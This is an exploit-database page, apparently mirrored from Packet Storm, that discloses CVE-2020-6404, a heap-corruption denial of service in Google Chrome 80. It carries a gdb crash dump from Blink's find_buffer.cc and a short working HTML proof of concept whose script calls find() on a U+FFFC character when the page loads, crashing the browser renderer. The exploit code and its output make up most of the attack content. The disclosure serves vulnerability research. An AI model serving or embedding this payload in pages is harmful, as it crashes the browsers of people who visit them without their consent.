Lucene search
K

Google Chrome 80.0.3987.87 Denial Of Service

🗓️ 23 Mar 2020 00:00:00Reported by Cem Onat KaragunType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 162 Views

Google Chrome 80.0.3987.87 Heap-Corruption Denial Of Servic

Related
Code
`# Exploit Title: Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)  
# Google Dork: N/A  
# Date: 2020-02-21  
# Exploit Author: Cem Onat Karagun of Diesec GmBH  
# Vendor Homepage: https://www.google.com/  
# Version: Google Chrome 80.0.3987.87  
# Tested on: Windows x64 / Linux Debian x64 / MacOS  
# CVE: CVE-2020-6404  
# PoC Video: http://www.youtube.com/watch?v=tv5sDDwiWg8  
# Description: https://bugs.chromium.org/p/chromium/issues/detail?id=1024256  
  
Thread 35 "Chrome_InProcRe" received signal SIGSEGV, Segmentation fault.  
[Switching to Thread 0x7f2cbf9ad700 (LWP 3275)]  
[----------------------------------registers-----------------------------------]  
RAX: 0x7f2cbe98d100 --> 0x41b58ab3  
RBX: 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0  
RCX: 0x1fffffffffffffff  
RDX: 0x7f2cbeb8bdf4 --> 0x0  
RSI: 0x7f2cbeb8bdc0 --> 0x613000000000 --> 0xcc6e96b9 --> 0x0  
RDI: 0x0  
RBP: 0x7f2cbf9aaa70 --> 0x7f2cbf9aabf0 --> 0x7f2cbf9aad10 -->  
0x7f2cbf9aadd0 --> 0x7f2cbf9aaea0 --> 0x7f2cbf9aafb0 (--> ...)  
  
RSP: 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0  
RIP: 0x559e50c11189 (<RangeFromBufferIndex()+377>: mov cl,BYTE PTR  
[rcx+0x7fff8000])  
R8 : 0xfffffffffffffff8  
R9 : 0x0  
R10: 0x7f2cbec6a670 --> 0x7f2cbec6a070 --> 0xd47000000000000 ('')  
R11: 0x7f2cbe98d100 --> 0x41b58ab3  
R12: 0xfe597d31a20 --> 0x0  
R13: 0x7f2cbeb8bde8 --> 0x0  
R14: 0x0  
R15: 0x2  
EFLAGS: 0x10a06 (carry PARITY adjust zero sign trap INTERRUPT direction  
OVERFLOW)  
[-------------------------------------code-------------------------------------]  
0x559e50c1117e <RangeFromBufferIndex()+366>: lea r8,[rdi-0x8]  
0x559e50c11182 <RangeFromBufferIndex()+370>: mov rcx,r8  
0x559e50c11185 <RangeFromBufferIndex()+373>: shr rcx,0x3  
=> 0x559e50c11189 <RangeFromBufferIndex()+377>: mov cl,BYTE PTR  
[rcx+0x7fff8000]  
0x559e50c1118f <RangeFromBufferIndex()+383>: test cl,cl  
0x559e50c11191 <RangeFromBufferIndex()+385>:  
jne 0x559e50c11418 <RangeFromBufferIndex()+1032>  
0x559e50c11197 <RangeFromBufferIndex()+391>: add  
rdi,0xffffffffffffffff  
0x559e50c1119b <RangeFromBufferIndex()+395>: mov rcx,rdi  
[------------------------------------stack-------------------------------------]  
0000| 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0  
0008| 0x7f2cbf9aa9c8 --> 0xc0c001162e6 --> 0x0  
0016| 0x7f2cbf9aa9d0 --> 0xfe597d717be --> 0x0  
0024| 0x7f2cbf9aa9d8 --> 0xfe597d717bd --> 0x0  
0032| 0x7f2cbf9aa9e0 --> 0x7f2cbeb8bdf4 --> 0x0  
0040| 0x7f2cbf9aa9e8 --> 0x7f2cbeb8bea0 --> 0x6060008b1720 -->  
0x602000098630 --> 0x200000003 --> 0x0  
  
0048| 0x7f2cbf9aa9f0 --> 0x21bec4d308 --> 0x0  
0056| 0x7f2cbf9aa9f8 --> 0xfe597cfab48 --> 0x0  
[------------------------------------------------------------------------------]  
Legend: code, data, rodata, value  
Stopped reason: SIGSEGV  
0x0000559e50c11189 in MappingForIndex ()  
at  
../../third_party/blink/renderer/core/editing/finder/find_buffer.cc:450  
450  
../../third_party/blink/renderer/core/editing/finder/find_buffer.cc: No  
such file or directory.  
  
  
<!DOCTYPE html>  
<head>  
<script type="text/javascript">  
document.addEventListener("DOMContentLoaded", function(){  
find(decodeURIComponent('\uFFFC'));  
});  
</script>  
</head>  
<body>  
<legend></legend>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Mar 2020 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.02045
162